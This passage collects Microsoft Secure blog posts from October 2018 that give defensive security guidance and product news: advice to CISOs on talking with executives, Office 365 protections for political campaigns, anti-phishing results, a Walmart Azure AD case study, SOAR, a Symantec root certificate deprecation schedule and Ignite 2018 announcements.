  • SimplifyTailor your conversation for your audience. Tech speak may resonate with a CIO, but other executives will get lost if you get too techy. And no matter who you are speaking with, its important that you speak in the language of business goals. How do your proposals and ideas best advance the goals of the executive that you are speaking with? And dont be afraid to engage the C-Suite in the activity of simplifying. If you ask the executives to think about how theyd explain ransomware or phishing to a very non-tech savvy relative, theyll be able to connect more closely with the technical risks and also, hopefully, have a bit more empathy for you, the security geek, whos tasked with explaining tough security risks to them.
  • SparkTap into the incredible power of why. Why does your company do what it does? Make sure your security pitch aligns to this overall mission. Explain how your security efforts get the company closer to achieving its vision. Go back to your corporate vision statement and ask the execs if a proposed policy or control ultimately supports that mission. When a CEO participating in an incident response simulation opts to report an incident, not because its legally required, but because our corporate values mean radical transparency with our customers, youve sparked real connection between technical risk management and the business.

Experience is one of our great teachers. As the CIO in this story learned, some security rules look good until they get in the way of executives. And some security measures may seem costly and unnecessary, but when weighed against massive reputational damage or material financial loss, those investments calibrate as frugal and wise. You don’t have to make your CIO a cyber ninja to have a productive conversation. To effect real change, engage executives as human beings in the cybersecurity policy and strategy decision-making process.

The post CISO series: Partnering with the C-Suite on cybersecurity appeared first on Microsoft Secure.

Categories: cybersecurity Tags:

Top 10 security steps in Microsoft 365 that political campaigns can take today

October 23rd, 2018 No comments

The increasing frequency of cyberattacks make clear that more must be done to protect key democratic institutions from cyber-enabled interference. Withjust a fewweeks left before theU.S.midtermelections and early voting under way,campaignsmust stay vigilant in protecting against cyberattacks to their online collaboration tools, including email.Microsoft recommendstaking action today to protect against phishing, malware,account compromise, and other threatsseeTop 10 ways to secure Office 365 and Microsoft 365 Business plans from cyberthreats.These recommendations are tailored for small to mid-sized political campaigns and election-focused stakeholders usingOffice 365or Microsoft 365. Any organizationespecially those without full-time IT security staffcan benefit fromtaking these actions.

This guidanceprovidesstep-by-step instructions forusing10 high-impact securitycapabilities.Theseactions help you implement many of the best practicesrecommended intheCybersecurity Campaign Playbook,created by the Defending Digital Democracy program at Harvard Kennedy SchoolsBelferCenter for Science and International Affairs.

Top 10cybersecurityrecommendations:

  1. Setuptwo-stepverification forall staff.
  2. Traincampaign staff to quickly identify phishing attacks.
  3. Use dedicated accountsfor administration.
  4. Raise the level of malware protection in mail.
  5. Protect against ransomware.
  6. Preventemailsauto-forwardingoutside of the campaign.
  7. Increase encryptionfor sensitive emails.
  8. Protect your email from phishing attacks.
  9. Protect against malicious attachments in email.
  10. Protect against phishing attacksthat includemalicious website links in email or other files.

Read Top 10 ways to secure Office 365 and Microsoft 365 Business plans from cyberthreatsfor details on how to implement each action.

These recommendations are provided as part of Microsofts ongoing commitment to theDefending Democracy Program. Qualifying organizations using Office 365 can also take advantage ofMicrosoftAccountGuardfor additional protectionto leverageMicrosoftsstate-of-the-artthreatdetectionand notification in case of targeted nation-state cyberattacks.

The post Top 10 security steps in Microsoft 365 that political campaigns can take today appeared first on Microsoft Secure.

Categories: cybersecurity Tags:

Take steps to secure your business and users with our security business assessment

Businesses can no longer afford to take cybersecurity for granted. You cant read the news without seeing a splashy headline about a successful hack or data breach at a well-known company. However, this isnt just a problem for large enterprisesincreasingly small and medium-sized businesses are becoming targets of cybercriminals and need to take steps to improve their security.

Yet it can be hard for small and medium-sized businesses to right size a security strategy for their unique business. We believe a good place to start is by answering these four questions:

  • How secure are your users and accounts?
  • How protected are you from threats?
  • How safe is your data?
  • How effectively are you managing security?

The Microsoft Security Assessment can help you discover where you are vulnerable and provide personalized recommendations to improve your security posture. Keep reading for a peek at some of our key learnings from the assessment.

How secure are your users and accounts?

In todays modern workplace, employees work from anywhere on any number of devices. This has been great for personal productivity, but has also created more possible points of entry for hackers to break in. One of the biggest challenges is to make it easy for your users to connect to the resources they need, from the devices they prefer, while balancing security for your company and its assets.

There are many ways to protect your accounts, but make sure you include Multi-Factor Authentication (MFA), as no password is foolproof. MFA is safer because it requires two forms of authentication to gain access. For example, you can require that users sign in with a password plus either a code generated by an application or a biometric, like fingerprints or facial recognition. Products such as Microsoft 365 Business make it easy to enable MFA for your email, file storage, and productivity apps, adding another layer of defense to your organization’s assets.

How protected are you from threats?

The latest figures show that cybercriminals are increasingly targeting small and medium-sized business alongside big businesses. Forty-one percent of businesses with fewer than 250 employees reported an attack in the last 12 months. Fortunately, there are practical things you can do to reduce your vulnerability, and every step makes a huge difference.

Two recommendations that are low cost, or even free, include maintaining software upgrade cycles and conducting regular employee training. If you dont require that employees keep software updated and patched, consider starting. Whether it is for the operating system, servers, devices, applications, plug-ins, or any other technology, updates will reduce security vulnerabilities. You can also increase your security posture through regular employee security training. The onboarding process is a good opportunity to share cybersecurity practices, but dont stop there. Consider putting a regular security training program in place to remind employees how to detect and report suspicious links, attachments, and emails; avoid malicious websites; and download only verified applications.

How safe is your data?

One of your most valuable assets is your data. Data includes everything from a private document, to personal identifiable information, to sales projections, and more. In all cases, it will be damaging to individuals and your business if it gets into the wrong hands. You need to protect sensitive data where it lives and while it travels.

One way to safeguard critical documents is with encrypted access. Document-level protection helps guarantee that only authorized users can read and inspect privileged data, even when it is sent outside of your organization. This level of protection is available in certain products, such as Microsoft 365 Business, which also includes the ability to notify and educate users when they are working with sensitive data.

How effectively are you managing security?

A strong defense is more than just a set of tools and practices. You need a thoughtful approach to how you manage security. Effective security management will give you visibility into vulnerabilities across all your resources, and it will encourage consistency across your security policies. With a strategic approach you will better understand your current risks and be able to identify opportunities to increase your protection.

A critical component of security management is periodic reviews of user access to data, devices, and networks. People, roles, and responsibilities change over time, which is why its good to know what roles have access to what resources.You can use this review to make sure that users have the right level of access, for the right time period, based on their role. For example, someone in HR might need to access the financial services database during a specific project. You can also make sure those that have left your organization or changed role have been de-provisioned, and you can investigate any suspicious activity that is detected.

Evaluate how well your businesses is protected

Unfortunately, it is not just the big brands that must combat cyberattacks. Small and medium-sized businesses are also at risk. Weve given you a sampling of our recommended security best practices, but there is still more you may want to consider. The security assessment can help you evaluate holistically how strong your current defenses are and provide specific actionable recommendations that you can put in place to increase your confidence and reduce your vulnerabilities.

Take the Microsoft Security Assessment and bookmark the Microsoft Secure blog to read up on the latest steps or deployment tips to keep your business safer.

 

1SMB ITDM Omnibus Survey

The post Take steps to secure your business and users with our security business assessment appeared first on Microsoft Secure.

Categories: cybersecurity Tags:

Voice of the Customer: Walmart embraces the cloud with Azure Active Directory

October 22nd, 2018 No comments

Todays post was written by Sue Bohn, partner director of Program Management and Ben Byford and Gerald Corson, senior directors of Identity and Access Management at Walmart.

Greetings!

Im Sue Bohn, partner director of Program Management at Microsoft. Im an insatiable, lifelong learner and I lead the Customer & Partner Success team for the Identity Division. Im jazzed to introduce the Voice of the Customer blog series.In this series, the best of our customers will present their deployment stories to help you learn how you can get the most out of Azure Active Directory (Azure AD).Today well hear from Walmart. I love the convenience of Walmart; where else can you buy tires, socks, and orange juice in one trip?

Walmart teamed up with Microsoft to digitally transform its operations, empower associates with easy-to-use technology, and make shopping faster and easier for millions of customers around the world. But this strategic partnership didnt just happen overnight. In the beginning, Walmarts cybersecurity team was skeptical about the security of the public cloud and Azure AD. Ben Byford and Gerald Corson, senior directors of Identity and Access Management at Walmart, share their teams journey working with Microsoft to embrace the cloud with Azure AD:

Working closely with our Microsoft account team convinced us we could safely write back to on-premises and enable password hash synch

In the beginning, we were willing to feed to the cloud but at that time not comfortable allowing the syncing of passwords to the cloud or write back to on-premises from cloud. We were skeptical of the security controls. We involved Microsoft in the strategy and planning phases of our initiatives and made slow but steady progress. As we worked with the Microsoft team, representatives were eager to get any and all feedback and to provide it to their product groups. This led to our critical Azure AD enhancement requests being received and solutions were delivered. When we ran into bugs, we were able to troubleshoot issues with the very people who wrote the application code. Our Microsoft account team was right there with us, in the trenches, and they were committed to making sure we were confident in Azure ADs capabilities. Over time, as we learned more about Azure AD and the new security features we were enabling, our trust in Microsofts Azure AD security capabilities grew and many of our security concerns were alleviated.

Given our scale, validating and verifying the security capabilities of Azure AD was key to empowering our users while still protecting the enterprise. Walmart currently has over 2.5 million Azure AD users enrolled, and with that many users we need very granular controls to adequately protect our assets. The entire team, including Microsoft, rolled up our sleeves to figure out how to make it work, and together weve enabled several features that let us apply custom security policies. Azure Information Protection (AIP), an amazing solution that is only possible with Azure AD, allows us to classify and label documents and emails to better protect our data. Azure AD Privileged Identity Management (PIM) gives us more visibility and control over admins. Azure AD dynamic groups lets us automatically enable app access to our users. This is a huge time saver in an environment with over half a million groups. With all of the work we did with Microsoft and our internal security team, we were able to turn on the two features we previously did not think we would be able topassword hash synch and write back from cloud to on-premises. This was critical to our journey as we had never allowed a cloud solution to feed back into our core environment in this manner.

Driving down help desk calls with self-service password reset

One example that shows how much we trust the security of Azure AD and the cloud is self-service password reset (SSPR). The biggest driver of help desk calls at Walmart is people who get locked out of their accounts because of a forgotten password. It wastes a tremendous amount of our help desks time and frustrates associates who lose time sitting on the phone. We believed that letting users reset their passwords and unlock their accounts without help desk involvement would go a long way and improve productivity, but we had always been nervous about giving people who werent on Walmart PCs that kind of access. Another hurdle was ensuring that our hourly associates were only able to utilize this service while they were clocked in for work. Microsoft helped us solve this with the implementation of custom controls.

Our Microsoft team supported us the entire way, and were proud to say that SSPR is being rolled out. When we started this journey, we would never have believed that we would allow people to reset their passwords from a public interface, but here we are, and the user experience is great!

Engage Microsoft early

If there is one thing we would have done differently, it would be to engage Microsoft at a deeper level earlier on in the process. Our public cloud adoption didnt really take off until we brought them in and spent time with their backend product engineering teams. Microsofts commitment to improving security and the cloud is clear. Their work to safeguard data has continuously improved, and while we work closer with them, they also continue to incorporate our feedback into future feature releases. It is the relationship that has allowed us to securely implement Azure AD at our scale.

We look forward to sharing our next big success: implementation of Azure AD B2B.

Voice of the Customer: looking ahead

Many thanks to Ben and Gerald for sharing their journey from on-premises to Azure AD. Our customers have told us how valuable it is to learn from their peers. The Voice of the Customer blog series is designed to share our customers security and implementation insights more broadly. Bookmark the Microsoft Secure blog so you dont miss part 2 in this series. Our next customer will speak to how Azure AD and implementing cloud Identity and Access Management makes them more secure.

The post Voice of the Customer: Walmart embraces the cloud with Azure Active Directory appeared first on Microsoft Secure.

Categories: Cloud Computing, cybersecurity Tags:

CISO series: Building a security-minded culture starts with talking to business managers

October 18th, 2018 No comments

Cybersecurity is everyones business; protecting the company and its users against data leaks is no longer just the responsibility of IT and security operations. Everyone from the board to Firstline Workers has an important role to play. A culture that encourages individuals to believe they have a part in defending the company against malicious behavior requires that each person is aware of the day-to-day risks and knows how their actions and choices can mitigate, or increase, those risks. This is why we will be writing a new series of blog posts for senior security experts and executives called the CISO series to help further discussions from within the organization to the boardroom to the customer and help establish that security culture and mindset.

If you are like many of your peers, one of the initiatives that youve put in place to create a culture where everyone in your organization takes security seriously is a required, annual security training for all employees. And, hopefully, it seems to be working. Feedback from security training indicates that employees have a better understanding of their role in cybersecurity. Even more important, many of your users have begun to take steps to improve their security posture, such as by reporting suspicious emails rather than clicking the links.

There’s just one problem. Today, one of your security operations managers brings to your attention a report showing that the sales division consistently gets low scores on the training. The sales team promotes your business products throughout the worldin Asia, Europe, North America, and South Americaoften accessing company data from overseas via unsecured wireless. If anyone needs to ace this training, its this team. Youre tempted to get on the phone immediately and provide the VP of Sales a litany of scary statistics that prove how critical this training is. But, fortunately, you stop yourself. If you have any hope of increasing compliance, you need this manager engaged in the solution and on your side. Whats more, if you handle the discussion properly, the VP of Sales could give you insights to help you craft a program that his team will embrace more enthusiastically.

Turn business managers into security evangelists

If you have any hope of turning the VP of Sales into an advocate you need to frame security in the language of the business by quantifying business impacts. Youve heard this before, but what does it mean in practice? What if we start with an even more basic truth: The most important thing to remember about the VP of Sales is that he/she is a human being. And so is everyone on the team. In other words, tried and true communication strategies that have been proven to work outside of cybersecurity also work with humans who happen to be business managers.

Five communication strategies proven to work

Take a look at the following communication strategies and see how they can be customized for your conversation with your own VP of Sales:

  • FeelYou probably have a list of statistics that could scare the VP of Sales into compliance, but they also might backfire, causing them to shut down. A more effective approach is to dial down the emotional undercurrent of the conversation and start by listening. You may think you know why the sales team has low training compliance, then again, maybe you dont. The very first step is understanding their side. Dont move on to solutions until you both are confident that you understand why the team has not prioritized the training.
  • FocusEveryone is trying to do 10 things at once, but continuous partial attention means we cant focus on whats important. Once you understand why the sales team has not been scoring high marks on the training, you can engage the business manager (VP of Sales) in a conversation that is laser-focused on their team needs, making it more likely that you both will put your full attention on the issue.
  • Slow downTime limits make us think less strategically. If you need time to gather the data that will support your case, consider calling for a pause, so you can do your due diligence. And make sure you time your conversation with the VP during a quiet time in the quarter. Year end is a hectic time for sales, and the worst time to try and squeeze in a cyber awareness discussion.
  • SimplifyRemember that tech speak is not the right language for this audience. Give some thought to how your security training supports the goals of the sales team. Access to reliable customer data like escalations and licenses is critical to a successful mobile data force. Cybersecurity is about ensuring the sales team has confidential access to that data wherever and whenever they need it. The VP will more likely understand your priorities if they understand how theyre aligned to their priorities.
  • SparkTap into the incredible power of why by explaining why your company needs security compliance. Make sure your security pitch and training align to this overall mission. Explain how your security efforts get the company closer to achieving its vision.

Creating a culture where everyone takes accountability for defending the enterprise against cybercrime will require that we get everyone engaged from the board and C-Suite executive to business managers and Firstline Workers. As you embark on this effort, keep in mind that how you say it is as important as what you say. You can create a path to success if you understand the motivations and goals of the business, and if you dont forget one core truth: Were all human. Please stay tuned for our next blog in this series where I will give you tips for engaging your C-Suite executive team in the cybersecurity conversation.

The post CISO series: Building a security-minded culture starts with talking to business managers appeared first on Microsoft Secure.

Categories: cybersecurity Tags:

How Office 365 learned to reel in phish

October 17th, 2018 No comments

Today’s post was coauthored by Debraj Ghosh, Senior Product Marketing Manager, and Jason Rogers, Principal Group Program Manager at Microsoft.

We recently reported how we measure catch rates of malicious emails for Office 365 Exchange Online Protection (EOP) (available with any Office 365 subscription) and Advanced Threat Protection (ATP) (available as a standalone service or with Office 365 E5).

Today, we’re sharing the results from the enhancements we made to anti-phish capabilities for Office 365 to address impersonation, spoof, and phish content and internal phish emails sent from compromised accounts. Over the last year, Microsofts threat analysts discovered threat actors pivoting from malware to sophisticated, often targeted phishing campaigns. The scale of these attacks and how quickly users click through on malicious links is shown in Figure 1.

Figure 1. Phish email statistics from Office 365 from January 2018 to September 2018.

Understanding the phish landscape

To develop solutions mitigating these modern phishing campaigns, our engineers rigorously analyzed phish emails in Office 365, uncovering a general pattern of phish campaigns following the path shown in Figure 2.

Figure 2. Phish email campaign pathway from initial reconnaissance to data exfiltration.

Additionally, since Office 365 is one of the worlds largest email service providers, Microsoft gains visibility and experience across mostif not alltypes of cyber threats. Every day, Microsoft analyzes 6.5 trillion signals, and each month we analyze 400 billion emails, while detonating 1 billion items in our sandbox. This telemetry helps us understand the full spectrum of phish attacks and the sophisticated and varied methods used by attackers, summarized in Figure 3. With this understanding of the phish landscape, our engineers not only designed new capabilities, but also enhanced existing capabilities to address the phishing emails being launched at customers.

Figure 3. Phish emails attack spectrum and variety of attack methods.

Understanding the situation

When we began our journey of enhancing our anti-phish capabilities, we admittedly were not best of breed at mitigating phish. As we alluded to previously, transparency with customers is a core priority at Microsoft. Figure 4 shows the number of phish emails that Microsoft (Office 365) missed in comparison to several other vendors also protecting email for customers within Office 365.

From November 2017 to January 2018, you see that Office 365 (orange bar in Figure 4) was not the best solution at phish catch. (We previously discussed how we measure phish catch.) The values are based on normalized email volume. As the inset plot shows, the scale of mail volume in Office 365 far exceeds the mail volume of third-party vendors. Fundamentally, this scale is one our differentiators and strengths as it offers us much greater depth and breadth into the threat landscape.

Figure 4. Normalized phish email miss from November 2017 to January 2018 in Office 365 email traffic. Inset shows actual mail flow volume.

Solving the problem with our technology, operations, and partnerships

Leveraging our signal from mail flow, the expertise of 3,500 in-house security professionals, and our annual $1 billion investment in cybersecurity, we strategically addressed the growing wave of phishing campaigns. Our engineers determined four categories of phish emails and designed capabilities addressing each type. Figure 5 summarizes the enhancements made to the anti-phish capabilities in Office 365.

Figure 5. Phish email categories and anti-phish enhancements made in Office 365 to address the categories.

Details on all the anti-phish updates for Office 365 are available in the following posts:

While the enhancements are interesting, ultimately, catch rate is the parameter that counts, and it is important to remember that no solution can ever stop all threats. Sometimes misses occur, and the most effective solution will miss the least. To this end, we are very excited to share our phish miss rate from May 1, 2018 to September 16, 2018. As you can see in Figure 6, today, when compared to the same set of vendors that we compared ourselves to in November to January, we exhibit the lowest miss rate of phish emails in Office 365. Figure 6 is the culmination of the incredible focus, drive, and expertise of Microsoft researchers and engineers working together to push the boundaries of threat research, machine learning, and development of algorithms that together provide customers the most impressive and effective protection against phish emails available for Office 365 today.

Figure 6. Normalized Phish Email Miss Rate in Office 365 from May 1, 2018 to September 16, 2018. Inset is a blowup of the graph from August 1, 2018 to September 16, 2018.

While the graph in Figure 6 is illuminating, we also want to share statistics from Office 365 EOP/ATP related to phish mitigation. Figure 7 is a summary of the remarkable impact these powerful new anti-phish capabilities across EOP/ATP have had with helping secure Office 365 users, and further showcases our tremendous depth and scale into the threat landscape. For those unfamiliar with Office 365 ATP, Safe Links provides time of click protection from malicious links in email where the click triggers several different protection technologies, including URL reputation checks, machine learning capabilities, and link detonation as needed. Recently, Safe Links expanded its capabilities to intra-org emails, making Office 365 ATP the only service to offer this type of protection while ensuring the internal emails remain within the compliance boundary of Office 365. We hope you agree at that the anti-phish capabilities have evolved at a remarkable pace and with amazing results.

Figure 7. The impact to end users from the enhanced anti-phish capabilities in Office 365.

Learn more

We hope this post provides a good overview on how we are helping customers with modern phishing campaigns. Please be sure to check out the Ignite session, Secure enterprise productivity with Office 365 threat protection services including EOP, ATP, and Threat Intelligence, where we give more details. Your feedback enables us to continue improving and adding features that will continue to make ATP the premiere advanced security service for Office 365. If you have not tried Office 365 ATP for your organization yet, you should begin a free Office 365 E5 trial today and start securing your organization from the modern threat landscape.

The post How Office 365 learned to reel in phish appeared first on Microsoft Secure.

Categories: cybersecurity Tags:

Secure file storage

October 16th, 2018 No comments

Image taken at the Microsoft Ignite Conference.

This is a blog series that responds to common questions we receive from customers about deployment of Microsoft 365 security solutions. In this series, youll find context, answers, and guidance for deployment and driving adoption within your organization. Check out Collaborate Securely, the fifth blog in our eight-blog series on deploying intelligent security scenarios.

Employees are often tasked with preparing documents that require them to gather expertise from various people, often both internal and external to their organization. This common practice can expose your company data at unsecured points along the way. To mitigate risk, Microsoft 365 has simplified and secured the process of sharing files so that employees can easily gather data, expert opinions, edits, and responsesfrom only the right people in a single document.

 

How can I centrally store information, so its discoverable by colleagues but not anyone else?

To answer this question, lets start with storage first, then move to search.

Store securely

To help your employees easily discover relevant data for their projects and keep that data internal and secure, you can build a team site in SharePoint Online. If your employees need to make their notes or informal insights discoverable, but keep the information secure, deploy OneNote and have employees password-protect their notes.

You can deploy OneNote through Microsoft Intune to your Intune-managed employee devices, or have your employees sign in with their Microsoft Azureprovisioned ID and download OneNote to their devices. The owner of the SharePoint library, list, or survey can change permissions to let the right people access the data they need while restricting others. You can also empower your employees to build and maintain their own SharePoint Online team with security safeguards that you have established.

Search securely

Once youve set up your team site, SharePoint Intelligent Search and Discovery allows both you and your employees to discover and organize relevant information from other employees work files across Microsoft 365. It keeps your organizations documents discoverable only within your protected cloud, according to each users permission settings. You can also set permissions, so your employees will see only documents that you have already given them access to.

 

How do I make use of automation to ensure that employees have the correct permissions?

By enabling a dynamic group in Azure Active Directory (Azure AD), you will ensure that users can be automatically assigned to groups according to attributes that you define. For example, if users move to a new department, when their department name changes in Azure AD, rules will automatically assign them to new security groups defined for their new department. By using these Azure ADbased advanced rules that enable complex, attribute-based, dynamic memberships for groups, you can protect organizational data on several levels.

 

Deployment tips from our experts

  • Make information discoverable and secure. Help your employees easily discover relevant data for their projects. Start by building a team site in SharePoint Online. Store notes securely in Microsoft OneNote and ensure they discover relevant information across Office 365 with SharePoint Intelligent Search and Discovery.
  • Plan for success with Microsoft FastTrack. FastTrack comes with your subscription at no additional charge. Whether youre planning your initial rollout, needing to onboard your product, or driving end-user adoption, FastTrack is your benefit service that is ready to assist you. Get started at FastTrack for Microsoft 365.

 

Want to learn more?

For more information and guidance on this topic, check out the white paper Empower people to discover, share, and edit files and information securely. You can find additional security resources on Microsoft.com.

Coming Soon! Share files easily and securely is the seventh installment of our Deploying Intelligent Scenarios” series. In November, we will kick off a new series: “Top 10 Security Deployment Actions with Microsoft 365 Security.”

 

More blog posts from this series

The post Secure file storage appeared first on Microsoft Secure.

Categories: Cloud Computing Tags:

Making it real—harnessing data gravity to build the next gen SOC

October 15th, 2018 No comments

This post was coauthored by Diana Kelley, Cybersecurity Field CTO, andSin John,EMEA Chief Security Advisor, Cybersecurity Solutions Group.

In our first blog, Diana and I talked about the concept of data gravity and how it could, conceptually, help organizations take a more cloud-ready approach to security operations and monitoring. In this post we address the question: How do we make this a reality in the security operations center (SOC) while we are under increased and constant pressure from motivated threat actors?

The answer lies in a new approach to monitoring called Security Orchestration, Automation and Response (SOAR), which is founded upon addressing the challenge of connecting and investigating issues across multiple security platforms. SOAR addresses the challenges of evolving security operations beyond the traditional security information and event management (SIEM) model into one that allows correlation across all the data gravity wells. Core to this is being able to take an event from one system (for example an endpoint like a laptop) and in real-time correlate that across different systemssuch as a mail hygiene gatewayin order to build evidence and apply context needed for a fast and efficient investigation. This is something that analysts have historically done manually to investigate an issue: look across multiple different evidence points to find the information behind an event to determine if its a false positive or if needs further investigation. Historically deciding what incidents need investigation was left to the SIEM model, but as we discussed in the last blog both the difficulties with false positives and the rules of data gravity make this more difficult to achieve.

Lets discuss how this can be achieved using Microsoft as an example.

We have a number of significant areas of data gravity within the technology that Microsoft customers use. These are Office 365, Windows, and Azure, each with a different focus and level of protection, but is what we need bring to together to share insights and events across these technical areas. This is where the Intelligent Security Graph comes into play for us. This is a subset of the Microsoft Graph focused specifically on sharing security information and insights that we see across our infrastructure:

Each of the areas of security products we have integrated with the graph allow us to share insights across different areas and build orchestration capability, context, and automation across systems without necessarily having to pull them all into one single aggregated log store. Analysis is done, as and when required, often driven by the machine learning and behavioral techniques that help to determine what information is needed.

The next step is to make this information available to others and why we released the graph security API. This is an open and free API that allows customers to interrogate Microsoft data in real-time for alerts and context that the Office 365, Windows, and Azure security systems hold. This allows organizations to integrate alerts into their own SOC or build automated playbooks and investigations built across the platform. This isnt just about orchestrating across Microsoft. The law of data gravity says that we must integrate with others and many leading security vendors have also integrated into the API to provide information into our platform for integration, and also to allow them to real-time query Microsoft to provide context in their own platforms.

When insights across multiple data gravity wells can be accessed and correlated in near real-time, the SOC analyst can spend far less time writing SIEM rules and more time tuning orchestration and automation that is focused on improving insight, reducing false positives, and investigating the important information. The capability that SOC vendors should be focusing on is building a real-time investigation platform that enables analysts to investigate security event signal across multiple vendors and investigate in real-time, by respecting the laws of data gravity. Meaningful insights and reducing mean time to identify (MTTI) and mean time to remediate (MTTR) are far better measures of SOC effectiveness than how many events per second (EPS) are processed.

To make the SOC of tomorrow a reality, the question you ask your security vendors needs to change. Instead of asking Can you send all your logs into my SIEM? ask these questions instead:

  • How do you orchestrate events across your own platform?
  • Do you provide APIs for me to query in real-time?
  • How do you integrate with other vendors?
  • What partnerships, orchestration, and automation capabilities do you have?

The SOC of tomorrow must look across multiple data sources, gravity wells, and hybrid clouds to provide a complete look at a company’s security posture. Look for vendors that understand this new architectural approach and are building cloud-aware solutions for tomorrow, not ones that are locked into an on-premises-centric past.

The post Making it real—harnessing data gravity to build the next gen SOC appeared first on Microsoft Secure.

Categories: cybersecurity, Security Response Tags:

Microsoft partners with DigiCert to begin deprecating Symantec TLS certificates

Starting in September 2018, Microsoft began deprecating the SSL/TLS capability of Symantec root certificates due to compliance issues. Google, Mozilla, and Apple have also announced deprecation plans related to Symantec SSL/TLS certificates. Symantec cryptographic certificates are used in critical environments across multiple industries. In 2017, DigiCert acquired Symantecs web security business that included their certificate authority business.

Since the compliance issues were identified, Microsoft has been engaged with Symantec and DigiCert to uphold industry-wide compliance expectations and maintain customer trust. DigiCert created the deprecation schedule below in partnership with Microsoft to maintain trust in the industry while minimizing impact to our mutual customers.

During certificate renewal, customers must now replace their current certificate with one signed by a non-Symantec root. Based on the schedule below, Microsoft Edge and Internet Explorer running on Windows 10/Windows Server 2016 will no longer trust certificates signed by the associated root certificate if issued after the TLS NotBefore Date. Any certificates issued prior to this date will continue to be trusted until the certificates natural expiration. Internet Explorer running on legacy Windows versions will not be impacted.

Customers with questions about their certificates or this deprecation schedule are encouraged to contact DigiCert by visiting SSL Certificate Support.

Name Thumbprint Planned TLS NotBefore Date
Symantec Class 3 Public Primary Certification Authority-G6 26A16C235A2472229B23628025BC8097C88524A1 9/30/2018
thawte Primary Root CA-G2 AADBBC22238FC401A127BB38DDF41DDB089EF012 9/30/2018
GeoTrust Universal CA E621F3354379059A4B68309D8A2F74221587EC79 9/30/2018
Symantec Class 3 Public Primary Certification Authority-G4 58D52DB93301A4FD291A8C9645A08FEE7F529282 1/31/2019
VeriSign Class 3 Public Primary Certification Authority-G4 22D5D8DF8F0231D18DF79DB7CF8A2D64C93F6C3A 1/31/2019
GeoTrust Primary Certification Authority-G2 8D1784D537F3037DEC70FE578B519A99E610D7B0 4/30/2019
VeriSign Universal Root Certification Authority 3679CA35668772304D30A5FB873B0FA77BB70D54 4/30/2019
thawte Primary Root CA-G3 F18B538D1BE903B6A6F056435B171589CAF36BF2 4/30/2019
GeoTrust Primary Certification Authority-G3 039EEDB80BE7A03C6953893B20D2D9323A4C2AFD 4/30/2019
GeoTrust 323C118E1BF7B8B65254E2E2100DD6029037F096 4/30/2019
thawte 91C6D6EE3E8AC86384E548C299295C756C817B81 4/30/2019
VeriSign 4EB6D578499B1CCF5F581EAD56BE3D9B6744A5E5 4/30/2019
GeoTrust Global CA DE28F4A4FFE5B92FA3C503D1A349A7F9962A8212 4/30/2019
VeriSign 132D0D45534B6997CDB2D5C339E25576609B5CC6 4/30/2019

 

The post Microsoft partners with DigiCert to begin deprecating Symantec TLS certificates appeared first on Microsoft Secure.

Categories: Data Privacy Tags:

Ignite 2018 highlights: passwordless sign-in, confidential computing, new threat protection, and more

What a week it was in Orlando! Ignite is always a biggie, and this one was no exception. For all of us here at Microsoft who get to work on security, spending time with customers to learn how you are using our security products today and to share new innovations to come is a highlight. At this year’s event we put even greater emphasis on providing attendees with access to engineering experts throughout more than one hundred focused sessions, workshops, and hands-on immersion experiences for the latest technologies in security. I was chuffed to see that our security booths at the center of the expo hall were chock-a-block for the whole event. Thank you to everyone who stopped by, attended our social and community events, and connected with our engineers and product managers.

After their security blanket work at the RSA Conference earlier this year, our social team once again took a shot at peak swag. Our Security SOCs were the result, lovingly designed and then crafted from the finest combed cotton, bringing fashion together with a six-month Enterprise Mobility + Security trialquite the combination.

Show us your own fashion moment through social media with #askmeaboutmySOC #showmeyourSOC.

More seriously, if you weren’t able to join us this year, or found yourself trading off between sessions or workshops at the show, don’t worry, our breakout sessions on security are available on-demand. At Ignite 2018, we also brought a deep lineup of new security innovations that I have summarized below, along with some top session recommendations:

Identity and access management

We really dont like passwords, so together we want to help you eliminate their use through simpler, more secure alternatives. New support for passwordless sign-in to Azure Active Directory (Azure AD) connected appsboth cloud and on-premisesthrough the Microsoft Authenticator app can help you replace passwords with a more secure, multi-factor sign-in that can reduce compromise by 99.9 percent and significantly simplify the user experience. Watch the Ignite session: Getting to a world without passwords.

We also announced two powerful new features in our set of identity governance capabilities for Azure AD to help automate the process of granting access to employees and partners: Entitlement Management and My Access. Watch the Ignite session: Govern access to your resources with Azure AD identity governance. And read more about identity and access management announcements.

Information protection

As you move more of your workloads to the cloud, meeting information security and compliance standards needs a new approach. Azure is the first cloud platform to offer confidentiality and integrity of data while in useadding to the protections already in place that help keep your data secure in transit and at rest. Azure confidential computing benefits are available soon on a new DC series of virtual machines in Azure, enabling trusted execution environments using Intel SGX chipsets to protect data while its being computed. Watch the Ignite session: Protection by design: Intel SGX and Azure Confidential Computing.

Weve also rolled out a new unified labeling experience in the Security & Compliance Center in Microsoft 365 that delivers a single, integrated approach to creating data sensitivity and data retention labels. You can preview new labeling capabilities that are built into Office apps across all major platforms and new extensions of labeling and protection capabilities to include PDFs. The Microsoft Information Protection SDK, now generally available, enables other software creators to enhance and build applications that understand, apply, and act on Microsoft sensitivity labels so you can have more cohesive information protection. Read more about the information protection announcements and watch the Ignite session.

Threat protection

Microsoft Threat Protection, announced at Ignite last week, is an integrated experience for detection, investigation, and remediation across endpoints, email, documents, identity, and infrastructure. This new integration in the Microsoft 365 admin console combines signal across all of Office 365 Advanced Threat Protection (ATP), Windows Defender ATP, Microsoft Cloud App Security, Azure AD Identity Protection, and the Azure Security Center to help you secure across your digital estate. The portal not only provides alerts and monitoring of threats, but also gives you the ability to make real-time policy changes to help your security strategy stay ahead of changing threats. Read more about Microsoft Threat Protection or watch the Ignite session.

Microsoft Cloud App Security can now leverage the traffic information collected by Windows Defender Advanced Threat Protection about the cloud apps and services being accessed from IT-managed Windows 10. This native integration provides admins a more complete view of cloud usage in their organization and easier investigative work. Read more about this integration or watch the Ignite session.

Security management

To help you strengthen your security posture, youll want to understand your current position and where to go from there. Microsoft Secure Score is the only dynamic report card for cybersecurity. Organizations that use the Secure Score assessments and recommendations typically reduce their chance of a breach by 30-fold. Microsoft Secure Score provides guidance to improve your security posture. For example, Secure Score can recommend taking steps to secure your admin accounts with Multi-Factor Authentication (MFA), secure users accounts with MFA, and turn off client-side email forwarding rules. Starting today, were expanding Secure Score to cover all of Microsoft 365. We are also introducing Secure Score for hybrid cloud workloads in the Azure Security Center, so you can have full visibility across your organizations entire estate. Read more about Microsoft Secure Score or watch the Ignite session.

Unified endpoint management

